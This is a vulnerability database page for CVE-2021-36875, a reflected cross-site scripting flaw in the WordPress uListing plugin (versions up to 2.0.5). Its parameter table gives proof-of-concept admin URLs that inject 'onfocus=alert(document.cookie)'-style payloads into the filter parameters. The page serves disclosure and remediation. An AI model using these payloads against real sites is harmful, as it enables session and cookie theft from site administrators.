Vulners
Lucene search
CVE-2021-36875
๐๏ธย 27 Sep 2021ย 15:32:52Reported byย PatchstackTypeย 
ย cve๐ย web.nvd.nist.gov๐ย 43ย Views๐ WEB
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2021-36875 | 1 Jul 202521:11 | โ | circl |
 | WordPress plugin Stylemix Directory Listings ่ทจ็ซ่ๆฌๆผๆด | 27 Sep 202100:00 | โ | cnnvd |
 | WordPress plugin uListing reflective cross-site scripting vulnerability | 28 Sep 202100:00 | โ | cnvd |
 | CVE-2021-36875 WordPress uListing plugin <= 2.0.5 - Auth. Reflected Cross-Site Scripting (XSS) vulnerability | 27 Sep 202115:32 | โ | cvelist |
 | EUVD-2021-23451 | 7 Oct 202500:30 | โ | euvd |
 | CVE-2021-36875 | 27 Sep 202116:15 | โ | nvd |
 | WordPress uListing plugin <= 2.0.5 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability | 27 Jul 202100:00 | โ | patchstack |
 | Cross site scripting | 27 Sep 202116:15 | โ | prion |
 | PT-2021-21388 ยท WordPress ยท Ulisting | 27 Sep 202100:00 | โ | ptsecurity |
 | CVE-2021-36875 WordPress uListing plugin <= 2.0.5 - Auth. Reflected Cross-Site Scripting (XSS) vulnerability | 27 Sep 202115:32 | โ | vulnrichment |
10
Node
[
{
"collectionURL": "https://wordpress.org/plugins/jetpack/",
"defaultStatus": "unaffected",
"packageName": "ulisting",
"product": "Directory Listings WordPress plugin โ uListing",
"vendor": "Stylemix",
"versions": [
{
"changes": [
{
"at": "2.0.6",
"status": "unaffected"
}
],
"lessThanOrEqual": "2.0.5",
"status": "affected",
"version": "n/a",
"versionType": "custom"
}
]
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| filter[id] | query param | /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%2F%2F&filter%5Buser%5D=&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 | Authenticated Reflected XSS via filter[id] parameter in uListing plugin | CWE-79 |
| filter[user] | query param | /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=&filter%5Buser%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 | Authenticated Reflected XSS via filter[user] parameter in uListing plugin | CWE-79 |
| filter[expired_date] | query param | /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D&filter%5Buser%5D&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=2021-06-15%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bcreated_date%5D&filter%5Bupdated_date%5D&paged=1 | Authenticated Reflected XSS via filter[expired_date] parameter in uListing plugin | CWE-79 |
| filter[created_date] | query param | /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D&filter%5Buser%5D&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date]&filter%5Bcreated_date%5D&filter%5Bupdated_date%5D&paged=1 | Authenticated Reflected XSS via filter[created_date] parameter in uListing plugin | CWE-79 |
| filter[updated_date] | query param | /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D&filter%5Buser%5D&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date&filter%5Bcreated_date%5D&filter%5Bupdated_date%5D=2021-06-15%22autofocus%3Dautofocus+onfocus%3Dalert(1553);%3B%20%2F%2F&paged=1 | Authenticated Reflected XSS via filter[updated_date] parameter in uListing plugin | CWE-79 |
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2026 16:07Current
4.9Medium risk
Vulners AI Score4.9
CVSS 23.5
CVSS 3.14.8 - 5.9
EPSS0.00259
SSVC